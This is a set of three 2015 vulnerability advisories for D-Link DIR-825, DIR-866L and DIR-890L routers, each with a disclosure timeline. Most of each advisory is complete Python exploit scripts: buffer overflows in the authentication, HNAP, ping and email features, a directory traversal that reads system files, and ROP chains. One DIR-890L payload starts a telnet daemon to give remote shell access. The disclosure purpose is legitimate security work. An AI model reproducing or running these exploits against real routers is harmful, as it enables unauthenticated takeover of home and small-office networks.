## Advisory Information
Title: DIR-825 (vC) Buffer overflows in authentication,HNAP and ping functionalities. Also a directory traversal
issue exists which can be exploited
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed
issues as per the email communication. The vendor had also released the information on their security advisory
pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly
accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing
this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-825 (vC) -- Wireless AC750 Dual Band Gigabit Cloud Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 4 security issues in DIR-825 firmware which allows an attacker to exploit buffer overflows in
authentication, HNAP and Ping functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited
by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack
directly or using XSRF if not exposed. The ping functionality based buffer overflow and directory traversal would
require an attacker to be on network and use XSRF to exploit buffer overflow whereas would require some sort of
authentication as low privileged user atleast to exploit directory traversal.
## Details
Buffer overflow in auth
-----------------------------------------------------------------------
import socket
import struct
'''
287 + XXXX in query_string value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
buf = "GET /dws/api/Login?test="
buf+="B"*251
buf+="CCCC" #s0
buf+="FFFF" #s1
buf+="FFFF" #s2
buf+="FFFF" #s3
buf+="XXXX" #s4
buf+="HHHH" #s5
buf+="IIII" #s6
buf+="JJJJ" #s7
buf+="LLLL"
buf+="\x2a\xbc\x8c\xa0" # retn address
buf+="C"*24 #
buf+="sh;;"
buf+="K"*20
buf+="\x2a\xc0\xd2\xa0" #s1
buf+="\x2a\xc0\xd2\xa0" #s1
buf
+="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCC"
buf+="&password=A HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml
+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
----------------------------------------------------------------------
Buffer overflow in HNAP
-----------------------------------------------------------------------
import socket
import struct
'''
4138 + XXXX in SoapAction value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
buf = "POST /HNAP1/ HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="SOAPACTION:http://purenetworks.com/HNAP1/GetDeviceSettings/"+"A"*4138+"\x2a\xbc\x8c\xa0"+"D"*834+"\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: uid:1111;\r\n"
buf+="Content-Length: 13\r\n\r\ntest=test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
----------------------------------------------------------------------
Directory traversal
----------------------------------------------------------------------
import socket
import struct
'''
Useful to do directory traversal attack which is possible in html_response_page variable below which prints the
conf file, but theoretically any file, most likely only after login accessible
'''
payload="html_response_page=../etc/host.conf&action=do_graph_auth&login_name=test&login_pass=test1&login_n=test2&l
og_pass=test3&graph_code=63778&session_id=test5&test=test"
buf = "POST /apply.cgi HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: session_id=test5;\r\n"
buf+="Content-Length: "+str(len(payload))+"\r\n\r\n"
buf+=payload+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
----------------------------------------------------------------------
Buffer overflow in ping
----------------------------------------------------------------------
import socket
import struct
'''
282 + XXXX in ping_ipaddr value, right now only working with Exit address as sleep address has bad chars which
disallows from using regular shellcode directly
'''
payload="html_response_page=tools_vct.asp&action=ping_test&html_response_return_page=tools_vct.asp&ping=ping&ping_
ipaddr=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"+"\x2a\xbc\x8c\xa0"+"CCXXXXDDDDEEEE&test=test"
buf = "POST /ping_response.cgi HTTP/1.1\r\n"
buf+= "Host: 10.0.0.90\r\n"
buf+="Proxy-Connection: keep-alive\r\n"
buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n"
buf+"Cache-Control: max-age=0\r\n"
buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143
Safari/537.36\r\n"
buf+="Accept-Encoding: gzip,deflate,sdch\r\n"
buf+="Accept-Language: en-US,en;q=0.8\r\n"
buf+="Cookie: session_id=test5;\r\n"
buf+="Content-Length: "+str(len(payload))+"\r\n\r\n"
buf+=payload+"\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
soc=s.recv(2048)
print soc
---------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
Tag Archives: Security
D-Link DIR-866L – Multiple Buffer Overflow Vulnerabilities
## Advisory Information
Title: DIR-866L Buffer overflows in HNAP and send email functionalities
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR866L -- AC1750 Wi-Fi Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issue in DIR866L firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilities in hnap and send email functionalities. An attacker needs to be on wireless LAN or management interface needs to be exposed on Internet to exploit HNAP vulnerability but it requires no authentication. The send email buffer overflow does require the attacker to be on wireless LAN or requires to trick administrator to exploit using XSRF.
## Details
HNAP buffer overflow
----------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Observe this in a emulator/debugger or real device/debugger
buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
buf+="FFFF"
buf+=struct.pack(">I",0x2abfc9f4) # s0 ROP 2 which loads S2 with sleep address
buf+="\x2A\xBF\xB9\xF4" #s1 useless
buf+=struct.pack(">I",0x2ac14c30) # s2 Sleep address
buf+="DDDD" #s3
buf+=struct.pack(">I",0x2ac0fb50) # s4 ROP 4 finally loads the stack pointer into PC
buf+=struct.pack(">I",0x2ac0cacc) # retn Loads s0 with ROP2 and ao with 2 for sleep
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGG" #This is the padding as SP is added with 32 bytes in ROP 1
buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # This is the padding as SP is added with 36 bytes in ROP 2
buf+=struct.pack(">I",0x2abcebd0) # This is the ROP 3 which loads S4 with address of ROP 4 and then loads S2 with stack pointer address
buf+="GGGGGGGGGGGGGGGG"
buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x
buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n"
# Bad chars \x00 - \x20
# sleep address 2ac14c30
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
---------------------------------------------------------------------
# Send email buffer overflow
---------------------------------------------------------------------
import socket
import struct
import string
import sys
BUFFER_SIZE = 2048
# Observe this in a emulator/debugger or real device/debugger
buf = "GET /send_log_email.cgi?test=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
buf+="1111" #s0 Loaded argument in S0 which is loaded in a0
buf+=struct.pack(">I",0x2ac14c30) #s4 Sleep address 0x2ac14c30
buf+="XXXX"
buf+="FFFF" # s3
buf+="XXXX"
buf+="BBBB" # s5
buf+="CCCC" # s6
buf+="DDDD" # s7
buf+="DDDD" # extra pad
buf+=struct.pack(">I",0x2ABE94B8) # Retn address 2ABE94B8 ROP1
buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" #
buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" #
buf+="XXXX" #
buf+="BBBBBBBBBBBBBBBB" #16 bytes before shellcode
buf+="CCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 80))
s.send(buf)
data = s.recv(BUFFER_SIZE)
s.close()
print "received data:", data
---------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley
D-Link DIR-890L/R – Multiple Buffer Overflow Vulnerabilities
## Advisory Information
Title: DIR-890L/R Buffer overflows in authentication and HNAP functionalities.
Date published: July,17th, 2015
Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink)
CVE: None
Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060,
http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061
However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes.
## Product Description
DIR-890L/R -- AC3200 Ultra Wi-Fi Router. Mainly used by home and small offices.
## Vulnerabilities Summary
Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. But it works as the buffer overflow happens in a seperate process than web server which does not allow web server to crash and hence attacker wins.
## Details
Buffer overflow in auth
----------------------------------------------------------------------
import socket
import struct
buf = "GET /webfa_authentication.cgi?id="
buf+="A"*408
buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack
buf+="sh;#"+"CCCC"+"DDDD" #R0-R2
buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values
buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address
buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd
buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left
buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------
Buffer overflow in HNAP
----------------------------------------------------------------------
import socket
import struct
#Currently the address of exit function in libraray used as $PC
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220
buf+= "\r\n" + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
----------------------------------------------------------------------
## Report Timeline
* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline.
* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor
* Nov 13, 2015: A public advisory is sent to security mailing lists.
## Credit
This vulnerability was found by Samuel Huntley